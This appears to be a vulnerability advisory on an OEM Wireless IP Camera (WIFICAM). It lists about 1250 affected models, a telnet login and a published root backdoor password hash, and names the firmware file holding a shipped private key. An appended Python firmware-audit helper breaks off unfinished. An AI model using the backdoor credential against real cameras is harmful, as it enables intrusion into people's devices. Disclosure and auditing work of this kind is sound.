Vulnerabilities in the OEM version of the Wireless IP Camera WIFICAM affect 1250+ models

Product description

The Wireless IP Camera (P2P) WIFICAM is a Chinese network camera that lets its users control the camera remotely.


Vulnerability summary

This is a generic camera produced and sold in bulk (OEM) by a single company. The Wireless IP Camera (P2P) WIFICAM is one of the branded cameras built on it.

The company therefore sells the same camera under different names, brands and feature sets. Each vendor's HTTP interface is different, but they all share the same vulnerabilities: the OEM vendor uses a custom build of GoAhead into which the vulnerable code was added.

GoAhead states that the GoAhead server itself is not affected by these vulnerabilities; it is the OEM vendor's customisation and vendor-specific development on top of GoAhead that introduced them.

Because of code reuse, these vulnerabilities (in particular the InfoLeak and the RCE) exist across a very long list of cameras, and together they allow pre-authentication root command execution on 1250+ camera models.

Summary of vulnerabilities:

  1. Backdoor account
  2. RSA key and certificate
  3. Pre-auth info leak (credentials) in the custom HTTP server
  4. Authenticated RCE as root
  5. Pre-auth RCE as root
  6. Misc – streaming without authentication
  7. Misc – "Cloud" (aka botnet)

Because the list of affected devices is very long, readers who do not want to go through the full list can jump to the details via the vulnerability summary above.

Our tests show that these vulnerabilities affect at least 1250+ camera models, mainly because the InfoLeak code in the custom HTTP server running on the cameras is largely identical across them, and it can be chained into RCE as root. These cameras are therefore very likely affected by the pre-auth RCE as root:

3G+IPCam Other
3SVISION Other
3com CASA
3com Other
3xLogic Other
3xLogic Radio
4UCAM Other
4XEM Other
555 Other
7Links 3677
7Links 3677-675
7Links 3720-675
7Links 3720-919
7Links IP-Cam-in
7Links IP-Wi-Fi
7Links IPC-760HD
7Links IPC-770HD
7Links Incam
7Links Other
7Links PX-3615-675
7Links PX-3671-675
7Links PX-3720-675
7Links PX3309
7Links PX3615
7Links ipc-720
7Links px-3675
7Links px-3719-675
7Links px-3720-675
A4Tech Other
ABS Other
ADT RC8021W
AGUILERA AQUILERA
AJT AJT-019129-BBCEF
ALinking ALC
ALinking Other
ALinking dax
AMC Other
ANRAN ip180
APKLINK Other
AQUILA AV-IPE03
AQUILA AV-IPE04
AVACOM 5060
AVACOM 5980
AVACOM H5060W
AVACOM NEW
AVACOM Other
AVACOM h5060w
AVACOM h5080w
Acromedia IN-010
Acromedia Other
Advance Other
Advanced+home lc-1140
Aeoss J6358
Aetos 400w
Agasio A500W
Agasio A502W
Agasio A512
Agasio A533W
Agasio A602W
Agasio A603W
Agasio Other
AirLink Other
Airmobi HSC321
Airsight Other
Airsight X10
Airsight X34A
Airsight X36A
Airsight XC39A
Airsight XX34A
Airsight XX36A
Airsight XX40A
Airsight XX60A
Airsight x10
Airsight x10Airsight
Airsight xc36a
Airsight xc49a
Airsight xx39A
Airsight xx40a
Airsight xx49a
Airsight xx51A
Airsight xx51a
Airsight xx52a
Airsight xx59a
Airsight xx60a
Akai AK7400
Akai SP-T03WP
Alecto 150
Alecto Atheros
Alecto DVC-125IP
Alecto DVC-150-IP
Alecto DVC-1601
Alecto DVC-215IP
Alecto DVC-255-IP
Alecto dv150
Alecto dvc-150ip
Alfa 0002HD
Alfa Other
Allnet 2213
Allnet ALL2212
Allnet ALL2213
Amovision Other
Android+IP+cam IPwebcam
Anjiel ip-sd-sh13d
Apexis AH9063CW
Apexis APM-H803-WS
Apexis APM-H804-WS
Apexis APM-J011
Apexis APM-J011-Richard
Apexis APM-J011-WS
Apexis APM-J012
Apexis APM-J012-WS
Apexis APM-J0233
Apexis APM-J8015-WS
Apexis GENERIC
Apexis H
Apexis HD
Apexis J
Apexis Other
Apexis PIPCAM8
Apexis Pyle
Apexis XF-IP49
Apexis apexis
Apexis apm-
Apexis dealextreme
Aquila+Vizion Other
Area51 Other
ArmorView Other
Asagio A622W
Asagio Other
Asgari 720U
Asgari Other
Asgari PTG2
Asgari UIR-G2
Atheros ar9285
AvantGarde SUMPPLE
Axis 1054
Axis 241S
B-Qtech Other
B-Series B-1
BRAUN HD-560
BRAUN HD505
Beaulieu Other
Bionics Other
Bionics ROBOCAM
Bionics Robocam
Bionics T6892WP
Bionics t6892wp
Black+Label B2601
Bravolink Other
Breno Other
CDR+king APM-J011-WS
CDR+king Other
CDR+king SEC-015-C
CDR+king SEC-016-NE
CDR+king SEC-028-NE
CDR+king SEC-029-NE
CDR+king SEC-039-NE
CDR+king sec-016-ne
CDXX Other
CDXXcamera Any
CP+PLUS CP-EPK-HC10L1
CPTCAM Other
Camscam JWEV-372869-BCBAB
Casa Other
Cengiz Other
Chinavasion Gunnie
Chinavasion H30
Chinavasion IP611W
Chinavasion Other
Chinavasion ip609aw
Chinavasion ip611w
Cloud MV1
Cloud Other
CnM IP103
CnM Other
CnM sec-ip-cam
Compro NC150/420/500
Comtac CS2
Comtac CS9267
Conceptronic CIPCAM720PTIWL
Conceptronic cipcamptiwl
Cybernova Other
Cybernova WIP604
Cybernova WIP604MW
D-Link DCS-910
D-Link DCS-930L
D-Link L-series
D-Link Other
DB+Power 003arfu
DB+Power DBPOWER
DB+Power ERIK
DB+Power HC-WV06
DB+Power HD011P
DB+Power HD012P
DB+Power HD015P
DB+Power L-615W
DB+Power LA040
DB+Power Other
DB+Power Other2
DB+Power VA-033K
DB+Power VA0038K
DB+Power VA003K+
DB+Power VA0044_M
DB+Power VA033K
DB+Power VA033K+
DB+Power VA035K
DB+Power VA036K
DB+Power VA038
DB+Power VA038k
DB+Power VA039K
DB+Power VA039K-Test
DB+Power VA040
DB+Power VA390k
DB+Power b
DB+Power b-series
DB+Power extcams
DB+Power eye
DB+Power kiskFirstCam
DB+Power va033k
DB+Power va039k
DB+Power wifi
DBB IP607W
DEVICECLIENTQ CNB
DKSEG Other
DNT CamDoo
DVR DVR
DVS-IP-CAM Other
DVS-IP-CAM Outdoor/IR
Dagro DAGRO-003368-JLWYX
Dagro Other
Dericam H216W
Dericam H502W
Dericam M01W
Dericam M2/6/8
Dericam M502W
Dericam M601W
Dericam M801W
Dericam Other
Digix Other
Digoo BB-M2
Digoo MM==BB-M2
Digoo bb-m2
Dinon 8673
Dinon 8675
Dinon SEGEV-105
Dinon segev-103
Dome Other
Drilling+machines Other
E-Lock 1000
ENSIDIO IP102W
EOpen Open730
EST ES-IP602IW
EST IP743W
EST Other
EZCam EPK-EP10L1
EZCam EZCam
EZCam Other
EZCam PAN/TILT
EZCam Pan/Tilt
EasyCam EC-101HD
EasyCam EC-101HDSD
EasyCam EC-101SD
EasyCam EC-102
EasyCam Other
EasyN 187
EasyN 1BF
EasyN 720P
EasyN F
EasyN F-136
EasyN F-M136
EasyN F-M166
EasyN F-M181
EasyN F-M1b1
EasyN F-SERIES
EasyN F133
EasyN F2-611B
EasyN F3
EasyN F3-166
EasyN F3-176M
EasyN F3-M166
EasyN F3-SERIES
EasyN F3-Series
EasyN F3-m187
EasyN F3M187
EasyN FS-613A-M136
EasyN FS-613B
EasyN FS-613B-M166
EasyN FS-613B-MJPEG
EasyN FS613
EasyN F_M10R
EasyN H3-V10R
EasyN H6-M137h
EasyN M091
EasyN Other
EasyN est-007660-611b
EasyN est-007660333
EasyN f
EasyN f-Series
EasyN f138
EasyN f_series
EasyN fseries
EasyN kitch
EasyN s
EasySE F/B/N/I
EasySE H3
EasySE H3e
EasySE Other
Ebode IPV38W
Ebode IPV58
Ebode Other
Ego Other
Elro 901
Elro 903
Elro 903IP
Elro C7031P
Elro C703IP2
Elro C704-IP
Elro C704IP
Elro C704IP.2
Elro C704ip
Elro C803IP
Elro C903IP
Elro C903IP.2
Elro C904IP
Elro C904IP.2
Elro IP901
Elro Other
Eminent 6564
Eminent EM6220
Eminent EM6564
Eminent em6220
Esky C5900
Esky L
Esky Live
Esky c5900
Eura-Tech IC-03C3
EyeCam ICAM-608
EyeCam IP65IW
EyeCam Other
EyeCam STORAGEOPTIONS
EyeIPCam IP901W
EyeSight ES-IP607W
EyeSight ES-IP811W
EyeSight ES-IP909IW
EyeSight ES-IP935FW
EyeSight ES-IP935IW
EyeSight IP910IW
EyeSight IP915IW
EyeSight Other
EyeSight ip609IW
EyeSight ip909iw
EyeSight ip915iw
EyeSight mjpeg
EyeSpy247 Other
F-Series FSERIES
F-Series Ip
F-Series Other
F-Series ip
First+Concept Other
Focuscam F19821W
Foscam FI18904w
Foscam FI18905E
Foscam FI18905W
Foscam FI18906w
Foscam FI1890W
Foscam FI18910E
Foscam FI18910W
Foscam FI18910w
Foscam FI18916W
Foscam FI18918W
Foscam FI18919W
Foscam FI19810W
Foscam FI8094W
Foscam FI81904W
Foscam FI8601W
Foscam FI8602W
Foscam FI8606W
Foscam FI8610w
Foscam FI8903W
Foscam FI8903W_Elita
Foscam FI8904
Foscam FI8904W
Foscam FI8905E
Foscam FI8905W
Foscam FI8905w
Foscam FI8906w
Foscam FI8907W
Foscam FI8908W
Foscam FI8909W
Foscam FI890W
Foscam FI8910
Foscam FI8910E
Foscam FI8910W
Foscam FI8910W_DW
Foscam FI8910w
Foscam FI8916W
Foscam FI8918
Foscam FI89180w
Foscam FI8918E
Foscam FI8918W
Foscam FI8918w
Foscam FI8919W
Foscam FI9804W
Foscam FI9805E
Foscam FI9810
Foscam FI9810W
Foscam FI9818
Foscam FI9820w
Foscam FI9821W
Foscam FI9821w
Foscam FL8910
Foscam FS18908W
Foscam FS8910
Foscam Fi8910
Foscam Other
Foscam fI8989w
Foscam fi1890w
Foscam fl8910w
FoxCam PTZ2084-L
GIGA gb
GT+ROAD HS-006344-SPSLM
General Other
Generic All-in-one
Generic Billy
Generic DomeA-Outdoor
Generic IP
Generic Other
Gi-star+srl IP6031W
Gigaeye GB
GoAhead EC-101SD
GoAhead GoAheadWebs
GoAhead IPCAM1
GoAhead IPCAM2
GoAhead Other
GoAhead thedon
GoCam Other
Goclever EYE
Goclever EYE2
Gotake GTK-TH01B
H+264+network+DVR 720p
H+264+network+DVR Other
H.264 Other
H6837WI Other
HD+IPC Other
HD+IPC SV3C
HDIPCAM Other
Heden CAMH04IPWE
Heden CAMHED02IPW
Heden CAMHED04IP
Heden CAMHED04IPWN
Heden CAMHEDIPWP
Heden Other
Heden VisionCam
Heden visionCam
HiSilicon Other
Hikvision DS-2CD2132
Histream RTSP
HooToo F-SERIES
HooToo HOOTOO
HooToo HT-IP006
HooToo HT-IP006N
HooToo HT-IP009HDP
HooToo HT-IP206
HooToo HT-IP207F
HooToo HT-IP210HDP
HooToo HT-IP210P
HooToo HT-IP212
HooToo IP009HDP
HooToo Other
HooToo apm-h803-mpc
Hsmartlink Other
Hungtek WIFI
ICAMView Other
ICam I908W
ICam IP-1
ICam Other
ICam Other2
ICam dome
INISOFT-CAM Stan
INSTAR 4010
INVID Other
IO+Data Other
IP66 Other
IPC IPC02
IPC Other
IPC S5030-TF
IPC S5030-m
IPC SRICAM
IPCC 3XPTZ
IPCC 7210W
IPCC IPCC-7210W
IPCC x01
IPTeles Other
IPUX ip-100
ISIT Other
IZOtech Other
IZTOUCH 0009
IZTOUCH A001
IZTOUCH IZ-009
IZTOUCH LTH-A8645-c15
IZTOUCH Other
IZTOUCH Other1
IZTOUCH ap001
IeGeek Other
IeGeek ukn
Inkovideo V-104
Iprobot3 Other
JRECam JM3866W
JWcam JWEV
JWcam Other
Jaycar 3834
Jaycar 720P
Jaycar Other
Jaycar QC-3831
Jaycar QC-3832
Jaycar QC-3834
Jaycar QC-3836
Jaycar QC-3839
Jaytech IP6021W
JhempCAM Back
JhempCAM Other
KaiKong 1601
KaiKong 1602w
KaiKong Other
KaiKong SIP
KaiKong SIP1602
KaiKong SIP1602W
KaiKong sip
KaiKong sip1602w
Kenton gjc02
Kinson C720PWIP
Klok Other
Knewmart KW01B
Knewmart KW02B
Kogan KAIPC01BLKA
Kogan KAIPCO1BLKA
Kogan Other
Kogan encoder
Kogan kaipc01blkb
Kompernass IUK
Koolertron Other
Koolertron PnP
Koolertron SP-SHEX21-SL
LC+security Other
LW lw-h264tf
LYD H1385H
Lager Other
Leadtek C351
LevelOne 1010/2010
Libor Other
LifeTech MyLifeTech
LifeTech Other
LifeTech dd
Lilly Other
Linq Other
Lloyds 1107
Loftek CXS
Loftek Nexus
Loftek Other
Loftek SPECTOR
Loftek Sendinel
Loftek Sentinel
LogiLink WC0030A
LogiLink wc0044
Logitech C920
MCL 610
MJPEG Other
Maginon 100
Maginon 10AC
Maginon 20C
Maginon IP-20c
Maginon IPC
Maginon IPC-1
Maginon IPC-10
Maginon IPC-100
Maginon IPC-100AC
Maginon IPC-10AC
Maginon IPC-2
Maginon IPC-20
Maginon IPC20C
Maginon IPC_1A
Maginon Other
Maginon SUPRA
Maginon Supra
Maginon ipc
Maginon ipc-1a
Maginon ipc100a
Maginon ipx
Maginon w2
Marmitek GM-8126
Maygion IP
Maygion OTHER2
Maygion Other
Maygion V3
Maygion black
Mediatech mt4050
Medisana SmartBabyMonitor
Merlin IP
Merlin Other
Merlin vstc
Messoa Other
Mingyoushi S6203Y-WR
Momentum 2002
Momentum MO-CAM
NEXCOM S-CAM
NIP NIP-004500-KMTLU
NIP NIP-075007-UPHTF
NIP NIP-11BGPW
NIP NIP-14
NTSE Other
Neewer Other
Neewer V-100
Neo+CoolCam NIP
Neo+CoolCam NIP-02(OAM)
Neo+CoolCam NIP-06
Neo+CoolCam NIP-066777-BWESL
Neo+CoolCam NIP-102428-DFBEF
Neo+CoolCam NIP-H20(OZX)
Neo+CoolCam OBJ-007260-LYLDU
Neo+CoolCam Other
Neo+CoolCam neo
Neo+CoolCam nip-11
Neo+CoolCam nip-20
Ness Other
NetView Other
Netcam Dual-HD
Netcam HSL-232245-CWXES
Netcam OUVIS
Netcam Other
Netware Other
Nexxt+Solution Xpy
Nixzen Other
NorthQ NQ-9006
Office+One CM-I11123BK
Office+One IP-900
Office+One IP-99
Office+One Other
Office+One SC-10IP
Office+One ip-900
Office+One ip900
Opexia OPCS
Optica+Video FI-8903W
Optica+Video FI-8918W
Optica+Video Other
Otto 4eye
Overmax CamSpot
Overmax Camspot
OwlCam CP-6M201W
P2p wificam
PCS Other
Panasonic BL-C131A
PeopleFu IPC-674
PeopleFu IPCAM1
PeopleFu IPCAM2
PeopleFu IPCAM3
PeopleFu IPCAM5
Pixpo 1Z074A2A0301627785
Pixpo PIX006428BFYZY
Pixpo PIX009491MLJYM
Pixpo PIX009495HURFE
Pixpo PIX010584DFACE
Plaisio IP
Planex Other
Planex PLANEX
Polariod P351S
Polaroid IP-100
Polaroid IP-101W
Polaroid IP-200B
Polaroid IP-201B
Polaroid IP-350
Polaroid IP-351S
Polaroid IP-360S
Polaroid IP-810W
Polaroid IP-810WZ
Polaroid Other
Polaroid POLIP101W
Polaroid POLIP201B
Polaroid POLIP201W
Polaroid POLIP351S
Polaroid POLIP35i5
PowerLead Caue
PowerLead PC012
ProveCam IP2521
Provision 717
Provision F-717
Provision F-737
Provision PT-737
Provision WP-711
Provision WP-717P
Pyle HD
Pyle HD22
Pyle HD46
Pyle Mine
Pyle PIPCAM15
Pyle Pipcam12
Pyle cam5
Pyle pipcam25
Pyle pipcam5
Q-nest QN-100S
Q-nest qn-100s
Queback 720p
ROCAM NC-400
ROCAM NC-500
ROCAM NC300
ROCAM NC300-1
ROHS IP
ROHS none
RTX 06R
RTX DVS
RTX IP-06R
RTX IP-26H
RTX Other
Rollei safetycam-10hd
SES Other
SKJM Other
SST SST-CNS-BUI18
SVB+International SIP-018262-RYERR
SafeHome 278042
SafeHome 616-W
SafeHome IP601W-hd
SafeHome Other
SafeHome VGA
SafeHome iprobot
Samsung Other
Santec-Video Other
Sarotech IPCAM-1000
Sarotech ip300
Scricam 004
Scricam 192.168.1.7
Scricam AP-004
Scricam AP-009
Scricam AP0006
Scricam AP006
Secam+CCTV IPCAM
Secam+CCTV Other
Seculink 10709
Seculink Other
Secur+Eye xxc5330
Seisa JK-H616WS
Senao PTZ-01H
Sequrecam Other
Sequrecam PNP-125
Sercomm Other
Shenwhen+Neo+Electronic+Co NC-541
Shenwhen+Neo+Electronic+Co Other
Shenwhen+Neo+Electronic+Co X-5000B
Shenzhen 720P
Shixin+China IP-129HW
Siepem IPC
Siepem S5001Y-BW
Siepem S6203y
Siepem S6211Y-WR
Simi+IP+Camera+Viewer Other
Sineoji Other
Sineoji PT-315V
Sineoji PT-3215P
Sineoji PT-325IP
Sinocam Other
Sky+Genious Genious
Skytronic IP
Skytronic IP99
Skytronic Other
Skytronic WiFi
Skytronic dome
SmartEye Other
SmartWares C723IP
SmartWares c724ip
SmartWares c923ip
SmartWares c924ip
Solwise SEC-1002W-IR
Spy+Cameras WF-100PCX
Spy+Cameras WF-110V
Sricam 0001
Sricam 004
Sricam A0009
Sricam A001
Sricam AP-001
Sricam AP-003
Sricam AP-004
Sricam AP-005
Sricam AP-006
Sricam AP-009
Sricam AP-012
Sricam AP-CAM
Sricam AP0009
Sricam AP002
Sricam AP995
Sricam Cam1
Sricam Front
Sricam Home
Sricam Other
Sricam SP005
Sricam SP012
Sricam SP013
Sricam SP015
Sricam SRICAM
Sricam SRICAM1
Sricam aj-c2wa-c118
Sricam ap
Sricam ap006
Sricam ap1
Sricam h.264
Sricam sp013
Sricctv A-0006
Sricctv A-009
Sricctv AJ-006
Sricctv AP-0001
Sricctv AP-0005
Sricctv AP-0009
Sricctv AP-001
Sricctv AP-002
Sricctv AP-003
Sricctv AP-004
Sricctv AP-004AF
Sricctv AP-005
Sricctv AP-006
Sricctv AP-007
Sricctv AP-008
Sricctv AP-009
Sricctv AP-011
Sricctv AP-014
Sricctv H-264
Sricctv Other
Sricctv P2P-BLACK
Sricctv P2P-Black
Sricctv SP-007
Sricctv SR-001
Sricctv SR-004
Star+Vedia 6836
Star+Vedia 7837-WIP
Star+Vedia C-7835WIP
Star+Vedia Other
Star+Vedia T-6836WTP
Star+Vedia T-7833WIP
Star+Vedia T-7837WIP
Star+Vedia T-7838WIP
StarCam C33-X4
StarCam EY4
StarCam F6836W
StarCam Other
StarCam c7837wip
Stipelectronics Other
Storage+Options HOMEGUARD
Storage+Options Other
Storage+Options SON-IPC1
Sumpple 610
Sumpple 610S
Sumpple 631
Sumpple 960P
Sumpple S601
Sumpple S610
Sumpple S631
Sumpple S651
Sumpple qd300
Sumpple s631
SunVision+US Other
Sunbio Other
Suneyes Other
Suneyes SP-T01EWP
Suneyes SP-T01WP
Suneyes SP-TM01EWP
Suneyes SP-TM01WP
Suneyes SP-tm05wp
Sunluxy H-264
Sunluxy HZCam
Sunluxy Other
Sunluxy PTZ
Sunluxy SL-701
Supra+Space IPC
Supra+Space IPC-1
Supra+Space IPC-100AC
Supra+Space IPC-10AC
Supra+Space Other11
Supra+Space ipc-20c
Sure-Eye Other
Surecom LN-400
Swann 005FTCD
Swann 440
Swann 440-IPC
Swann ADS-440
Swann ADS-440-PTZ
Swann ADS-CAMAX1
Swann Other
Swann SWADS-440-IPC
Swann SWADS-440IPC-AU
Sygonix 43176A
Sygonix 43558A
Szneo CAM0X
Szneo CoolCam
Szneo NIP
Szneo NIP-0
Szneo NIP-02
Szneo NIP-031
Szneo NIP-031H
Szneo NIP-06
Szneo NIP-12
Szneo NIP-2
Szneo NIP-20
Szneo NIP-210485-ABABC
Szneo NIP-26
Szneo NIP-X
Szneo NP-254095
Szneo Other
Szneo TFD
TAS-Tech Other
Technaxx tx-23
Techview GM8126
Techview QC-3638
Techview qc3839
Temvis Other
Tenda C50S
Tenda c30
Tenda c5+
Tenvis 0012
Tenvis 3815
Tenvis 3815-W
Tenvis 3815W
Tenvis 3815W.
Tenvis 3815W2013
Tenvis IP-319W
Tenvis IP-319w
Tenvis IP-391W
Tenvis IP-391WHD
Tenvis IP-602W
Tenvis IP602W
Tenvis IPROBOT
Tenvis JP-3815W
Tenvis JPT-3814WP2P
Tenvis JPT-3815
Tenvis JPT-3815-P2P
Tenvis JPT-3815W
Tenvis JPT-3815W+
Tenvis JPT-3815WP2P
Tenvis JPT-3815w
Tenvis JPT-3818
Tenvis MINI-319W
Tenvis Mini-319
Tenvis Other
Tenvis PT-7131W
Tenvis TH-661
Tenvis TR-3818
Tenvis TR-3828
Tenvis TR3815W
Tenvis TZ100
Tenvis TZ100/IPROBOT3
Tenvus JPG3815W
Threeboy IP-660
Topcam SL-30IPC01Z
Topcam SL-720IPC02Z
Topcam SL-910IW30
Topica+CCTV Other
Trivision NC-335PW-HD-10
Trust NW-7500
Turbo+X Endurance
Turbo+X IIPC-20
Uokoo 720P
VCatch Other
VCatch VC-MIC720HK
Valtronics IP
Valtronics Other
Vandesc IP900
Vantech Other
Vantech PTZ
Videosec+Security IPC-103
Videosec+Security IPP-105
Vimicro Other
Vitek+CCTV Other
Vstarcam 7823
Vstarcam C-7824WIP
Vstarcam C-7833WIP-X4
Vstarcam C-7833wip
Vstarcam C-7837WIP
Vstarcam C-7838WIP
Vstarcam C50S
Vstarcam C7816W
Vstarcam C7824WIP
Vstarcam C782WIP
Vstarcam C7842WIP
Vstarcam C93
Vstarcam C=7824WIP
Vstarcam Cam360
Vstarcam F-6836W
Vstarcam H-6837WI
Vstarcam H-6837WIP
Vstarcam H-6850
Vstarcam H-6850WIP
Vstarcam H-6850wip
Vstarcam ICAM-608
Vstarcam Other
Vstarcam T-6835WIP
Vstarcam T-6836WTP
Vstarcam T-6892wp
Vstarcam T-7815WIP
Vstarcam T-7833WIP
Vstarcam T-7833wip
Vstarcam T-7837WIP
Vstarcam T-7838WIP
Vstarcam T-7892WIP
Vstarcam T6836WTP
Vstarcam T7837WIP
Vstarcam c7815wip
Vstarcam c7833wip
Vstarcam c7850wip
Wanscam 00D6FB01980F
Wanscam 106B
Wanscam 118
Wanscam 541-W
Wanscam 543-W
Wanscam 790
Wanscam AJ-C0WA-198
Wanscam AJ-C0WA-B106
Wanscam AJ-C0WA-B116
Wanscam AJ-C0WA-B168
Wanscam AJ-C0WA-B1D8
Wanscam AJ-C0WA-C0D8
Wanscam AJ-C0WA-C116
Wanscam AJ-C0WA-C126
Wanscam AJ-C2WA-B118
Wanscam AJ-C2WA-C116
Wanscam AJ-C2WA-C118
Wanscam AJ-C2WA-C198
Wanscam AJ-COWA-B1D8
Wanscam AJ-COWA-C116
Wanscam AJ-COWA-C126
Wanscam AJ-COWA-C128
Wanscam AW00004J
Wanscam B1D8-1
Wanscam C-118
Wanscam C-126
Wanscam Colour
Wanscam FI-18904w
Wanscam FR-4020A2
Wanscam FR4020A2
Wanscam HD-100W
Wanscam HW-0021
Wanscam HW-0022
Wanscam HW-0022HD
Wanscam HW-0023
Wanscam HW-0024
Wanscam HW-0025
Wanscam HW-0026
Wanscam HW-0028
Wanscam HW-0033
Wanscam HW-0036
Wanscam HW-0038
Wanscam HW-0039
Wanscam HW-22
Wanscam HW0030
Wanscam IP
Wanscam JW-0001
Wanscam JW-0003
Wanscam JW-0004
Wanscam JW-0004m
Wanscam JW-0005
Wanscam JW-0006
Wanscam JW-0008
Wanscam JW-0009
Wanscam JW-0010
Wanscam JW-0011
Wanscam JW-0011l
Wanscam JW-0012
Wanscam JW-0018
Wanscam JW-004
Wanscam JW-009
Wanscam JW-CD
Wanscam JW000008
Wanscam JW0009
Wanscam JW001
Wanscam JW0012
Wanscam JW008
Wanscam JWEV
Wanscam JWEV-011777-NSRVV
Wanscam JWEV-011921-RXSXT
Wanscam JWEV-360171-BBEAC
Wanscam JWEV-380096-CECDB
Wanscam JWEV-PEPLOW
Wanscam NBC-543W
Wanscam NC-530
Wanscam NC-541
Wanscam NC-541/W
Wanscam NC-541W
Wanscam NC-541w
Wanscam NC-543W
Wanscam NCB-534W
Wanscam NCB-540W
Wanscam NCB-541W
Wanscam NCB-541WB
Wanscam NCB-543W
Wanscam NCBL-618W
Wanscam NCH-532MW
Wanscam NCL-610W
Wanscam NCL-612W
Wanscam NCL-616W
Wanscam NCL-S616W
Wanscam Other
Wanscam TG-002
Wanscam WJ-0004
Wanscam WX-617
Wanscam Works
Wanscam XHA-120903181
Wanscam XHA-4020a2
Wanscam __PTZ
Wanscam chiOthernese
Wanscam ip
Wanscam jw0005
Wanscam jw0010
Wansview 541
Wansview 625W
Wansview MCM-627
Wansview N540w
Wansview NCB-534W
Wansview NCB-541W
Wansview NCB-541w
Wansview NCB-543W
Wansview NCB541W
Wansview NCB545W
Wansview NCL-610W
Wansview NCL610D04
Wansview NCL614W
Wansview Other
Wansview dcs543w
Wansview nc543w
Wardmay+CCTV WDM-6702AL
Watch+bot+Camera resup
WebcamXP Other
WinBook Other
WinBook T-6835
WinBook T-6835WIP
WinBook T-7838
Winic NVT-530004
Wise+Group Other
X-Price Other
X10 39A
X10 AIRSIGHT
X10 AirSight
X10 Airsight
X10 Jake
X10 Other
X10 XC-38A
X10 XX-36A
X10 XX-39A
X10 XX-56A
X10 XX-59A
X10 XX-60
X10 XX-69A
X10 XX41Ahome
XVision Other
XXCamera 53100
XXCamera 5330-E
XXCamera Other
XXCamera XXC-000723-NJFJD
XXCamera XXC-092411-DCAFC
XXCamera XXC-50100-H
XXCamera XXC-50100-T
XXCamera XXC-5030-E
XXCamera XXC-53100-T
XXCamera XXC52130
Xin+Ling Other
Yawcam Other
Zilink Other
Zmodo CMI-11123BK
Zmodo IP-900
Zmodo Other
Zodiac+Security 909
Zodiac+Security Other
Zoneway NC638MW-P
ZyXEL Other
alexim Other
alexim cam22822
alias Other
all+in+one+ Other
all+in+one+ b1
all-in-one Other
allecto DVC-150IP
apc Other
asw-006 Other
boh l
bravo Other
bush+plus BU-300WF
ccam p2p
china 8904W
china HDIPCAM
china IPCAM
china Other
china PTZCAM
china np-02
ciana+exports antani
cina Other
coolead L
coolead L610WS
dax Other
denver IPC-320
denver IPO-320
e-landing 720p
eScam QF100
ebw Other
epexis PIPCAMHD82
epexis pipcam5
esecure nvp
geeya C602
geeya P2P
geeya c801
hdcam Other
homeguard 720P
homeguard Other
homeguard Wireless
homeguard wifi
iView ID002A
iView Other
insteon 75790
insteon 75790wh
insteon High
insteon Other
insteon Wireless
iuk 5A1
ivision hdwificam
iwitness bullet
jwt Other
jyacam JYA8010
kadymay KDM-6800
kadymay KDM6702
kadymay KMD-6800
kadymay Other
kang+xun xxc5030-t
kines Other
kiocong 1601
kiocong 1602
kiocong 1609
kiocong Other
kodak 201pl
koicong 1601
l+series CAM0758
l+series CAM0760
l+series Other
l+series V100
logan n8504hh
meyetech 095475-caeca
meyetech 188091-EFBAE
meyetech Other
meyetech WirelessCam
micasaverde VistaCamSD
pipcam HD17
pni 941w
pni IP451W
pni IP541W
pni IP941W
pni IP951W
pni Other
pnp IP
pnp Other
semac Other
skylink WC-300PS
storex D-10H

Shodan lists 195,368 cameras that can be attacked.


Details – Backdoor account

By default, telnetd is running on the camera.

user@kali$ telnet 192.168.1.107
Trying 192.168.1.107...
Connected to 192.168.1.107.
Escape character is '^]'.

apk-link login: admin
Password:

telnet> q
Connection closed.
user@kali$

The camera contains a backdoor account:

root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh

Details – RSA key and certificate

/system/www/pem/ck.pem contains an Apple certificate together with its private RSA key:

/ # cat /system/www/pem/ck.pem 
Bag Attributes
 friendlyName: Apple Production IOS Push Services: com.app.camera
 localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D 
subject=/UID=com.app.camera/CN=Apple Production IOS Push Services: com.app.camera/OU=SQ6NNPBE2K/C=US
issuer=/C=US/O=Apple Inc./OU=Apple Worldwide Developer Relations/CN=Apple Worldwide Developer Relations Certification Authority
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----
Bag Attributes
 friendlyName: andrew
 localKeyID: 74 9E 29 D0 6A 47 1B 35 AD D4 68 6D 46 D8 E2 37 C8 DA A1 9D 
Key Attributes: <No Attributes>
-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
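The two findings above (a root account with a hardcoded password hash in the passwd file, and a PEM file in the web root that carries a private key next to its certificate) are the kind of thing a firmware audit should catch before a device ships or gets deployed. The following helper is an added example, not code from the advisory or from the camera vendor: it parses passwd-style lines and PEM text taken from an unpacked firmware image. The sample passwd lines and the PEM text are constructed here (the PEM body is placeholder text, not real key material); the only value taken from the advisory is the root password hash quoted above.

```python
"""Audit helpers for an unpacked camera firmware image (added example).

Given the content of /etc/passwd and of any PEM files found in the extracted
root filesystem, report (a) UID-0 accounts that can log in with a password
baked into the image, and (b) private-key blocks shipped inside the firmware.
"""
import re

# Constructed sample: the root entry quoted in the advisory plus two ordinary
# accounts for contrast (a shadowed user and a locked system account).
SAMPLE_PASSWD = """root:$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0:0:0::/root:/bin/sh
admin:x:1000:1000::/home/admin:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/false
"""

# Constructed stand-in for /system/www/pem/ck.pem: only the markers matter,
# the bodies are placeholder text.
SAMPLE_PEM = """Bag Attributes
    friendlyName: Apple Production IOS Push Services: com.app.camera
-----BEGIN CERTIFICATE-----
MIIC...placeholder...
-----END CERTIFICATE-----
-----BEGIN RSA PRIVATE KEY-----
MIIE...placeholder...
-----END RSA PRIVATE KEY-----
"""

# Hashes already published as shared/backdoor credentials (from the advisory).
KNOWN_BACKDOOR_HASHES = {"$1$ybdHbPDn$ii9aEIFNiolBbM9QxW9mr0"}
NO_LOGIN_SHELLS = {"/bin/false", "/sbin/nologin", "/usr/sbin/nologin"}
CRYPT_SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt"}
PRIVATE_KEY_MARKER = re.compile(r"-----BEGIN (?:RSA |EC |)PRIVATE KEY-----")


def parse_passwd(text):
    """Yield (name, hash_field, uid, shell) for every well-formed passwd line."""
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue  # comments, blank lines, corrupt entries
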